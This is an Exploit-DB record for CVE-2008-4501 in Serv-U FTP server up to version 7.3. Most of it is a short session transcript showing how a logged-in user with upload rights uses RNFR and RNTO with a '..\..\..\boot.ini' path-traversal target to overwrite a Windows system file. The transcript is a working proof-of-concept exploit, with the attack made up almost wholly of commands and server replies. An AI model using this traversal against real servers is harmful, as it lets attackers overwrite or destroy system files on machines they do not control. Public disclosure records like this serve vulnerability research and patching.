Serv-U <= 7.3 - Remote FTP File Replacement Vulnerability auth

2008-10-03T00:00:00
ID EDB-ID:6661
Type exploitdb
Reporter dmnt
Modified 2008-10-03T00:00:00

Description

Serv-U <= 7.3 Remote FTP File Replacement Vulnerability (auth). CVE-2008-4501. Remote exploit for windows platform

                                        
                                            #Serv-U &lt;= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

# milw0rm.com [2008-10-03]